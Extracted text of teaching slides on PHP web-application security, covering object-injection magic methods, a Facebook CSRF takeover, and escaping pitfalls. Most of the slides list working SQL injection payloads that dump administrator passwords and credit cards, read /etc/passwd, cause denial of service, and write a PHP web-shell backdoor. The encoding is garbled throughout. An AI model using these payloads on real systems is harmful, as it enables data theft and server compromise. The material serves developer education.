This document provides an overview of common web application vulnerabilities such as SQL injection, cross-site scripting (XSS), cross-site request forgery (CSRF), file inclusion, and PHP object injection. It explains how inputs should be sanitized to prevent these issues, including using functions like htmlspecialchars(), mysql_real_escape_string(), and regular expressions. Exploits for vulnerabilities in specific programs are also listed. The document aims to educate developers on security best practices for protecting against hackers.
24. __construct()Gets called when a new object
is created.
__destruct()Called when there are no more
references to an object or when an object
is destroy
__wakeup()Unserialize() triggers this to
allow reconstruction of resources to be
used
42. Real-World
http://pyx.io/blog/facebook-csrf-leading-to-full-account-takeoverSo, the
course of action to take over victim's account would be:
1. Use "Find contacts on Facebook" from attacker account and log all
requests
2. Find /contact-importer/login request
3. Remove added email from your (attacker) account
4. Get the victim to somehow make the /contact-importer/login request
(infinite possibilities here)
5. Email is now added to victim's account, silently
6. Use "Forgot your password" to take over the account
43.
44. SQL Injection
âŠ
mysql_query(âSELECT * FROM news WHERE id = â.$_GET[âidâ]);
...
âŠ
mysql_query(âSELECT * FROM users WHERE name = ââ.$_GET[âidâ].âââ;);
...
âŠ
mysql_query(âSELECT * FROM news WHERE content LIKE â%â.$_GET[âidâ].â%ââ;);
...
45. Dump database:
â ?id=1 UNION SELECT version(),null
â ?id=1 UNION SELECT username,password FROM
administrator
â ?id=1 UNION SELECT )numberno,name FROM
creditcards
46. DoS:
â ?id=1 UNION SELECT benchmark(1,999999),null
Write/Read File (with file_priv = 1):
â ?id=1 UNION SELECT load_file(â/etc/passwdâ),null
â ?id=1 UNION SELECT â<?=system($_GET[x])?>â,null
INTO OUTFILE â/var/www/backdoor.phpâ
47. htmlspecialchars,htmlentities
$input = â123 ' " < > â; // 123 â â < >
htmlspecialchars($input,ENT_QUOTES); //Output: 123 ' " < >
htmlentities($input,ENT_QUOTES); //Output: 123 ' " < >
$username = htmlentities($_POST[âusernameâ],ENT_QUOTES);
$password = htmlentities($_POST[âpasswordâ],ENT_QUOTES);
SELECT * FROM users WHERE username=â$usernameâ AND password=â$passwordâ
?username=
&password= OR 1-===>... WHERE username=ââ AND password=â OR 1--â
48. mysql_real_escape_string
mysql_real_escape_string() calls MySQL's library function mysql_real_escape_string, which prepends
backslashes to the following characters: x00, n, r, , ', " and x1a.
This function must always (with few exceptions) be used to make data safe before sending a query
to MySQL.
$id = mysql_real_escape_string($_GET[âidâ]);
mysql_query(âSELECT * FROM news WHERE id = â.$id);
...
!!???
?id=1 UNION SELECT version(),null